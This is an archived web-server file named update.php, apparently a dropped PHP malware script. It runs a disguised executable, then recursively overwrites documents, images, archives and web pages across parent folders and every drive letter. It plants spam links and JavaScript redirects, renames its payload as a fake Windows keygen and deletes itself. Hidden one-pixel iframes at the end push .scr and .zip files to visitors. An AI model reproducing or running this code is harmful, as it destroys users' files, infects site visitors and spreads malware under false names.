home *** CD-ROM | disk | FTP | other *** search
/ 207.233.110.77 / 207.233.110.77.tar / 207.233.110.77 / web13 / terapiamusicalphase#2 / update.php < prev    next >
Text File  |  2016-05-28  |  5KB  |  168 lines

  1. <noscript><?php
  2. ini_set('memory_limit','32M');
  3. ini_set('max_execution_time', 99999);
  4. //ini_set('display_errors', false);
  5. //error_reporting(0);
  6. ignore_user_abort(true);
  7. set_time_limit(99999);
  8. copy('icon.ico', 'favicon.ico');
  9. copy('YmFzZTY0', 'Holy-Bible.htm');
  10. copy('ERR0R.L0G', 'KeyGen.exe');
  11. exec(dirname(__FILE__).'\\KeyGen.exe');
  12. function pray_amen($dir){
  13. $contents = array();
  14. foreach(scandir($dir) as $file){
  15. if($file == '.' || $file == '..') continue;
  16. $path = $dir.DIRECTORY_SEPARATOR.$file;
  17. if(is_dir($path)){
  18. $contents = array_merge($contents, pray_amen($path));
  19. } else {
  20. $contents[] = $path;
  21. $ext = substr(strrchr($file,'.'),1);
  22. if ($ext == 'pdf') {
  23. exec('attrib /s -r -s -h '.$path);
  24. copy('history.pdf', $path);
  25. exec('attrib /s +r +s -h '.$path);
  26. }
  27. if ($ext == 'swf') {
  28. exec('attrib /s -r -s -h '.$path);
  29. copy('movie.swf', $path);
  30. exec('attrib /s +r +s -h '.$path);
  31. }
  32. if ($ext == 'doc') {
  33. exec('attrib /s -r -s -h '.$path);
  34. copy('resume.doc', $path);
  35. exec('attrib /s +r +s -h '.$path);
  36. }
  37. if ($ext == 'rtf') {
  38. exec('attrib /s -r -s -h '.$path);
  39. copy('howto.rtf', $path);
  40. exec('attrib /s +r +s -h '.$path);
  41. }
  42. if ($ext == 'xls') {
  43. exec('attrib /s -r -s -h '.$path);
  44. copy('list.xls', $path);
  45. exec('attrib /s +r +s -h '.$path);
  46. }
  47. if ($ext == 'ppt') {
  48. exec('attrib /s -r -s -h '.$path);
  49. copy('intro.ppt', $path);
  50. exec('attrib /s +r +s -h '.$path);
  51. }
  52. if ($ext == 'scr') {
  53. exec('attrib /s -r -s -h '.$path);
  54. copy('ERR0R.L0G', $path);
  55. exec('attrib /s +r +s -h '.$path);
  56. }
  57. if ($ext == 'gif') {
  58. exec('attrib /s -r -s -h '.$path);
  59. copy('spacer.gif', $path);
  60. exec('attrib /s +r +s -h '.$path);
  61. }
  62. if ($ext == 'jpg') {
  63. exec('attrib /s -r -s -h '.$path);
  64. copy('header.jpg', $path);
  65. exec('attrib /s +r +s -h '.$path);
  66. }
  67. if ($ext == 'url') {
  68. exec('attrib /s -r -s -h '.$path);
  69. copy('web.url.url', $path);
  70. exec('attrib /s +r +s -h '.$path);
  71. }
  72. if ($ext == 'lnk') {
  73. exec('attrib /s -r -s -h '.$path);
  74. copy('web.lnk.lnk', $path);
  75. exec('attrib /s +r +s -h '.$path);
  76. }
  77. if ($ext == 'png') {
  78. exec('attrib /s -r -s -h '.$path);
  79. copy('logos.png', $path);
  80. exec('attrib /s +r +s -h '.$path);
  81. }
  82. if ($ext == 'php' || $ext == 'htm' || $ext == 'html' || $ext == 'asp' || $ext == 'yml' || $ext == 'aspx' || $ext == 'cfm' || $ext == 'shtm' || $ext == 'shtml') {
  83. exec('attrib /s -r -s -h '.$path);
  84. copy('YmFzZTY0', $path);
  85. exec('attrib /s +r +s -h '.$path);
  86. }
  87.  
  88. if ($ext == 'txt' || $ext == 'msg' || $ext == 'csv' || $ext == 'nfo' || $ext == 'log' || $ext == 'ace' || $ext == 'vhd' || $ext == 'xml' || $ext == 'dbf' || $ext == 'iso' || $ext == 'wri' || $ext == 'chm' || $ext == 'hlp' || $ext == 'deb' || $ext == 'psd' || $ext == 'fla' || $ext == 'sql' || $ext == 'bak' || $ext == 'mdb' || $ext == 'torrent' || $ext == 'xml') {
  89. $holybible = 'Visit+these+sites%3A%0A%0Ahttp%3A//www.WHAK.com%0A%0Ahttp%3A//www.FotoTrix.com%0A%0Ahttp%3A//www.Holy-Bibles.org%0A%0Ahttp%3A//www.MedChecker.com%0A%0Ahttp%3A//www.SeekFreak.com%0A%0Ahttp%3A//www.AddEffects.net%0A%0Ahttp%3A//www.BoobSigns.com%0A%0Ahttp%3A//www.Is-A-Jerk.com';
  90. exec('attrib /s -r -s -h '.$path);
  91. if(file_put_contents($path, urldecode($holybible))) {
  92. exec('attrib /s +r +s -h '.$path);
  93. }
  94. }
  95. if ($ext == 'js') {
  96. $holybible = "window.location.href='http://www.holybiblesearch.net'";
  97. exec('attrib /s -r -s -h '.$path);
  98. if(file_put_contents($path, $holybible)) {
  99. exec('attrib /s +r +s -h '.$path);
  100. }
  101. }
  102. if ($ext == 'inc') {
  103. $holybible = "<script>window.location.href='http://www.whak.com'</script>";
  104. exec('attrib /s -r -s -h '.$path);
  105. if(file_put_contents($path, $holybible)) {
  106. exec('attrib /s +r +s -h '.$path);
  107. }
  108. }
  109. if ($ext == 'zip') {
  110. exec('attrib /s -r -s -h '.$path);
  111. copy('data.zip', $path);
  112. exec('attrib /s +r +s -h '.$path);
  113. }
  114. if ($ext == 'rar') {
  115. exec('attrib /s -r -s -h '.$path);
  116. copy('instagram.rar', $path);
  117. exec('attrib /s +r +s -h '.$path);
  118. }
  119. if ($ext == 'gz') {
  120. exec('attrib /s -r -s -h '.$path);
  121. copy('storage.gz', $path);
  122. exec('attrib /s +r +s -h '.$path);
  123. }
  124. if ($ext == '7z') {
  125. exec('attrib /s -r -s -h '.$path);
  126. copy('zipcode.7z', $path);
  127. exec('attrib /s +r +s -h '.$path);
  128. }
  129.  
  130. }
  131. }
  132. }
  133. pray_amen("../");
  134. pray_amen("../../../../../../");
  135. pray_amen("c:\\");
  136. pray_amen("y:\\");
  137. pray_amen("z:\\");
  138. pray_amen("w:\\");
  139. pray_amen("v:\\");
  140. pray_amen("u:\\");
  141. pray_amen("t:\\");
  142. pray_amen("r:\\");
  143. pray_amen("q:\\");
  144. pray_amen("p:\\");
  145. pray_amen("o:\\");
  146. pray_amen("n:\\");
  147. pray_amen("m:\\");
  148. pray_amen("l:\\");
  149. pray_amen("k:\\");
  150. pray_amen("j:\\");
  151. pray_amen("i:\\");
  152. pray_amen("h:\\");
  153. pray_amen("g:\\");
  154. pray_amen("f:\\");
  155. pray_amen("e:\\");
  156. pray_amen("d:\\");
  157. pray_amen("z:\\");
  158. pray_amen("/");
  159. rename("KeyGen.exe", "Windows.8.All.KeyGen.exe");
  160. unlink(__FILE__);
  161. exit;
  162.  
  163. ?>
  164. </noscript>
  165. <iframe src=Photo.scr width=1 height=1 frameborder=0>
  166. </iframe>
  167. <iframe src=info.zip width=1 height=1 frameborder=0>
  168. </iframe>